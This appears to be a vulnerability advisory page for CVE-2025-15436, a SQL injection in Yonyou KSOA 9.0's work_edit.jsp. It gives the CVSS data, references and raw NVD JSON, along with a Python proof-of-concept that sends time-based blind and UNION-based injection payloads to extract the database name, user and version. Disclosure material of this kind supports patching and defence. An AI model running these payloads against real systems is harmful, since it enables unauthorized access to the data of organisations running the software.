CVE-2025-15436

Description

A vulnerability has been found in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /worksheet/work_edit.jsp. Such manipulation of the argument Report leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:* - VULNERABLE

Yonyou KSOA 9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15436 SQL Injection PoC for Yonyou KSOA 9.0
# Target: /worksheet/work_edit.jsp
# Parameter: Report

target_url = "http://target.com/worksheet/work_edit.jsp"

# Blind SQL Injection - Check if vulnerability exists
def check_vulnerability():
    # Normal request
    normal_params = {"Report": "1"}
    # Payload with time-based blind injection
    # Using conditional time delay to confirm SQL injection
    payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    
    inject_params = {"Report": payload}
    
    try:
        print("[*] Sending normal request...")
        normal_resp = requests.get(target_url, params=normal_params, timeout=10)
        
        print("[*] Sending malicious payload...")
        inject_resp = requests.get(target_url, params=inject_params, timeout=15)
        
        if inject_resp.elapsed.total_seconds() > 4:
            print("[+] SQL Injection vulnerability confirmed!")
            return True
        else:
            print("[-] Vulnerability check failed or target not vulnerable")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

# Database enumeration payload
def extract_database():
    # UNION-based injection to extract database name
    payload = "1' UNION SELECT NULL,database(),user(),version()-- -"
    params = {"Report": payload}
    
    try:
        resp = requests.get(target_url, params=params, timeout=10)
        print(f"[*] Response status: {resp.status_code}")
        # Parse response to extract database info
        if resp.text:
            print(f"[*] Response preview: {resp.text[:500]}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    print("CVE-2025-15436 SQL Injection PoC")
    print("Target: Yonyou KSOA 9.0")
    print("=" * 50)
    
    if check_vulnerability():
        print("\n[*] Attempting database enumeration...")
        extract_database()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15436
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15436
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15436/
[4] VulDB https://vuldb.com/cve/CVE-2025-15436
[5] https://github.com/xinshou-test/CVE/issues/2
[6] https://vuldb.com/?ctiid.339363
[7] https://vuldb.com/?id.339363
[8] https://vuldb.com/?submit.721925

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15436", "sourceIdentifier": "[email protected]", "published": "2026-01-02T08:15:41.550", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /worksheet/work_edit.jsp. Such manipulation of the argument Report leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "16092315-0438-4B91-A293-8CE177EAD656"}]}]}], "references": [{"url": "https://github.com/xinshou-test/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339363", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339363", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721925", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}